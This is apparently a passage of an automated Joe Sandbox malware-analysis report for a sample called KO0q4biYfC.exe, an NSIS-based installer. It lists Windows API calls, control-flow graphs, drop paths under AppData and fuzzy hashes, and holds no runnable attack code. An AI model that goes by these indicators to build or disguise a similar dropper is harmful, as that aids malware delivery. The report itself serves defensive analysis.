                                              • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406736
                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: xgB
                                              • API String ID: 2295610775-399326502
                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                              APIs
                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402183
                                              Strings
                                              • C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 004021C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Roaming\brugser\brugo
                                              • API String ID: 542301482-2288025642
                                              • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                              • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                              • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                              • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 190 403e86-403e98 191 403fd9-403fe8 190->191 192 403e9e-403ea4 190->192 193 404037-40404c 191->193 194 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 191->194 192->191 195 403eaa-403eb3 192->195 197 40408c-404091 call 4043ab 193->197 198 40404e-404051 193->198 194->193 199 403eb5-403ec2 SetWindowPos 195->199 200 403ec8-403ecb 195->200 212 404096-4040b1 197->212 204 404053-40405e call 401389 198->204 205 404084-404086 198->205 199->200 201 403ee5-403eeb 200->201 202 403ecd-403edf ShowWindow 200->202 207 403f07-403f0a 201->207 208 403eed-403f02 DestroyWindow 201->208 202->201 204->205 227 404060-40407f SendMessageW 204->227 205->197 211 40432c 205->211 216 403f0c-403f18 SetWindowLongW 207->216 217 403f1d-403f23 207->217 213 404309-40430f 208->213 215 40432e-404335 211->215 219 4040b3-4040b5 call 40140b 212->219 220 4040ba-4040c0 212->220 213->211 222 404311-404317 213->222 216->215 225 403fc6-403fd4 call 4043c6 217->225 226 403f29-403f3a GetDlgItem 217->226 219->220 223 4040c6-4040d1 220->223 224 4042ea-404303 DestroyWindow EndDialog 220->224 222->211 228 404319-404322 ShowWindow 222->228 223->224 229 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 223->229 224->213 225->215 230 403f59-403f5c 226->230 231 403f3c-403f53 SendMessageW IsWindowEnabled 226->231 227->215 228->211 260 404126-40412b 229->260 261 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 229->261 234 403f61-403f64 230->234 235 403f5e-403f5f 230->235 231->211 231->230 239 403f72-403f77 234->239 240 403f66-403f6c 234->240 238 403f8f-403f94 call 404338 235->238 238->225 243 403fad-403fc0 SendMessageW 239->243 245 403f79-403f7f 239->245 240->243 244 403f6e-403f70 240->244 243->225 244->238 246 403f81-403f87 call 40140b 245->246 247 403f96-403f9f call 40140b 245->247 256 403f8d 246->256 247->225 257 403fa1-403fab 247->257 256->238 257->256 260->261 264 40416c-40416d 261->264 265 40416f 261->265 266 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 4041a1-4041b2 SendMessageW 266->267 268 4041b4 266->268 269 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 267->269 268->269 269->212 280 4041ff-404201 269->280 280->212 281 404207-40420b 280->281 282 40422a-40423e DestroyWindow 281->282 283 40420d-404213 281->283 282->213 285 404244-404271 CreateDialogParamW 282->285 283->211 284 404219-40421f 283->284 284->212 286 404225 284->286 285->213 287 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 4042d0-4042e3 ShowWindow call 4043ab 287->292 294 4042e8 292->294 294->213
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                              • ShowWindow.USER32(?), ref: 00403EDF
                                              • DestroyWindow.USER32 ref: 00403EF3
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                              • EnableWindow.USER32(?,?), ref: 00404162
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                              • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404197
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID: (7B
                                              • API String ID: 3282139019-3251261122
                                              • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                              • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 295 403ad8-403af0 call 4067c2 298 403af2-403b02 call 40632f 295->298 299 403b04-403b3b call 4062b6 295->299 307 403b5e-403b87 call 403dae call 405dc5 298->307 303 403b53-403b59 lstrcatW 299->303 304 403b3d-403b4e call 4062b6 299->304 303->307 304->303 313 403c19-403c21 call 405dc5 307->313 314 403b8d-403b92 307->314 320 403c23-403c2a call 40640a 313->320 321 403c2f-403c54 LoadImageW 313->321 314->313 315 403b98-403bc0 call 4062b6 314->315 315->313 325 403bc2-403bc6 315->325 320->321 323 403cd5-403cdd call 40140b 321->323 324 403c56-403c86 RegisterClassW 321->324 338 403ce7-403cf2 call 403dae 323->338 339 403cdf-403ce2 323->339 326 403da4 324->326 327 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 324->327 329 403bd8-403be4 lstrlenW 325->329 330 403bc8-403bd5 call 405cea 325->330 332 403da6-403dad 326->332 327->323 333 403be6-403bf4 lstrcmpiW 329->333 334 403c0c-403c14 call 405cbd call 4063e8 329->334 330->329 333->334 337 403bf6-403c00 GetFileAttributesW 333->337 334->313 341 403c02-403c04 337->341 342 403c06-403c07 call 405d09 337->342 348 403cf8-403d12 ShowWindow call 406752 338->348 349 403d7b-403d7c call 405523 338->349 339->332 341->334 341->342 342->334 356 403d14-403d19 call 406752 348->356 357 403d1e-403d30 GetClassInfoW 348->357 352 403d81-403d83 349->352 354 403d85-403d8b 352->354 355 403d9d-403d9f call 40140b 352->355 354->339 360 403d91-403d98 call 40140b 354->360 355->326 356->357 358 403d32-403d42 GetClassInfoW RegisterClassW 357->358 359 403d48-403d6b DialogBoxParamW call 40140b 357->359 358->359 365 403d70-403d79 call 403a28 359->365 360->339 365->332
                                              APIs
                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                              • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000), ref: 00403B59
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\brugser\brugo,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403BD9
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\brugser\brugo,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\brugser\brugo), ref: 00403C40
                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                              • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C95
                                              • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brugser\brugo$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 1975747703-70161172
                                              • Opcode ID: e3f75488d19024041f1bb343cbf8cb78a09e2a23954cfc0fd164e097734ab2b2
                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                              • Opcode Fuzzy Hash: e3f75488d19024041f1bb343cbf8cb78a09e2a23954cfc0fd164e097734ab2b2
                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 369 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 372 402f80-402f85 369->372 373 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 369->373 374 4031cf-4031d3 372->374 381 4030a8-4030b6 call 402e8e 373->381 382 402fbe-402fd5 373->382 388 403187-40318c 381->388 389 4030bc-4030bf 381->389 384 402fd7 382->384 385 402fd9-402fe6 call 403447 382->385 384->385 393 403143-40314b call 402e8e 385->393 394 402fec-402ff2 385->394 388->374 391 4030c1-4030d9 call 40345d call 403447 389->391 392 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 389->392 391->388 421 4030df-4030e5 391->421 418 403139-40313e 392->418 419 40314d-40317d call 40345d call 4031d6 392->419 393->388 398 403072-403076 394->398 399 402ff4-40300c call 405e99 394->399 404 403078-40307e call 402e8e 398->404 405 40307f-403085 398->405 399->405 414 40300e-403015 399->414 404->405 406 403087-403095 call 4068b5 405->406 407 403098-4030a2 405->407 406->407 407->381 407->382 414->405 420 403017-40301e 414->420 418->374 429 403182-403185 419->429 420->405 422 403020-403027 420->422 421->388 421->392 422->405 424 403029-403030 422->424 424->405 426 403032-403052 424->426 426->388 428 403058-40305c 426->428 430 403064-40306c 428->430 431 40305e-403062 428->431 429->388 432 40318e-40319f 429->432 430->405 433 40306e-403070 430->433 431->381 431->430 434 4031a1 432->434 435 4031a7-4031ac 432->435 433->405 434->435 436 4031ad-4031b3 435->436 436->436 437 4031b5-4031cd call 405e99 436->437 437->374
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402F44
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\KO0q4biYfC.exe,?), ref: 00402F60
                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405EE2
                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KO0q4biYfC.exe,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00402FA9
                                              • GlobalAlloc.KERNELBASE(?,0040A230), ref: 004030F0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KO0q4biYfC.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 2803837635-2436266766
                                              • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                              • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 653 40640a-406415 654 406417-406426 653->654 655 406428-40643e 653->655 654->655 656 406444-406451 655->656 657 406656-40665c 655->657 656->657 658 406457-40645e 656->658 659 406662-40666d 657->659 660 406463-406470 657->660 658->657 662 406678-406679 659->662 663 40666f-406673 call 4063e8 659->663 660->659 661 406476-406482 660->661 664 406643 661->664 665 406488-4064c6 661->665 663->662 669 406651-406654 664->669 670 406645-40664f 664->670 667 4065e6-4065ea 665->667 668 4064cc-4064d7 665->668 673 4065ec-4065f2 667->673 674 40661d-406621 667->674 671 4064f0 668->671 672 4064d9-4064de 668->672 669->657 670->657 680 4064f7-4064fe 671->680 672->671 677 4064e0-4064e3 672->677 678 406602-40660e call 4063e8 673->678 679 4065f4-406600 call 40632f 673->679 675 406630-406641 lstrlenW 674->675 676 406623-40662b call 40640a 674->676 675->657 676->675 677->671 682 4064e5-4064e8 677->682 687 406613-406619 678->687 679->687 684 406500-406502 680->684 685 406503-406505 680->685 682->671 688 4064ea-4064ee 682->688 684->685 690 406540-406543 685->690 691 406507-406525 call 4062b6 685->691 687->675 693 40661b 687->693 688->680 694 406553-406556 690->694 695 406545-406551 GetSystemDirectoryW 690->695 696 40652a-40652e 691->696 697 4065de-4065e4 call 40667c 693->697 699 4065c1-4065c3 694->699 700 406558-406566 GetWindowsDirectoryW 694->700 698 4065c5-4065c9 695->698 701 406534-40653b call 40640a 696->701 702 4065ce-4065d1 696->702 697->675 698->697 704 4065cb 698->704 699->698 703 406568-406572 699->703 700->699 701->698 702->697 707 4065d3-4065d9 lstrcatW 702->707 709 406574-406577 703->709 710 40658c-4065a2 SHGetSpecialFolderLocation 703->710 704->702 707->697 709->710 712 406579-406580 709->712 713 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 710->713 714 4065bd 710->714 715 406588-40658a 712->715 713->698 713->714 714->699 715->698 715->710
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(Call,?), ref: 0040654B
                                              • GetWindowsDirectoryW.KERNEL32(Call,?,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,00405487,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000), ref: 0040655E
                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,00405487,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000), ref: 0040659A
                                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,00405487,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000), ref: 00406631
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 717251189-3886836084
                                              • Opcode ID: 8d374faab8b67e02b20779b8a2e58b36efa0b5910af5fdc4d12e9da804621c5a
                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                              • Opcode Fuzzy Hash: 8d374faab8b67e02b20779b8a2e58b36efa0b5910af5fdc4d12e9da804621c5a
                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 780 40176f-401794 call 402c41 call 405d34 785 401796-40179c call 4063e8 780->785 786 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 780->786 791 4017b5-4017b6 call 40667c 785->791 786->791 795 4017bb-4017bf 791->795 796 4017c1-4017cb call 40672b 795->796 797 4017f2-4017f5 795->797 805 4017dd-4017ef 796->805 806 4017cd-4017db CompareFileTime 796->806 798 4017f7-4017f8 call 405eb9 797->798 799 4017fd-401819 call 405ede 797->799 798->799 807 40181b-40181e 799->807 808 40188d-4018b6 call 405450 call 4031d6 799->808 805->797 806->805 809 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 807->809 810 40186f-401879 call 405450 807->810 822 4018b8-4018bc 808->822 823 4018be-4018ca SetFileTime 808->823 809->795 842 401864-401865 809->842 820 401882-401888 810->820 825 402ace 820->825 822->823 824 4018d0-4018db CloseHandle 822->824 823->824 827 4018e1-4018e4 824->827 828 402ac5-402ac8 824->828 829 402ad0-402ad4 825->829 831 4018e6-4018f7 call 40640a lstrcatW 827->831 832 4018f9-4018fc call 40640a 827->832 828->825 838 401901-4022fc call 405a4e 831->838 832->838 838->829 842->820 844 401867-401868 842->844 844->810
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\brugser\brugo,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\brugser\brugo,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
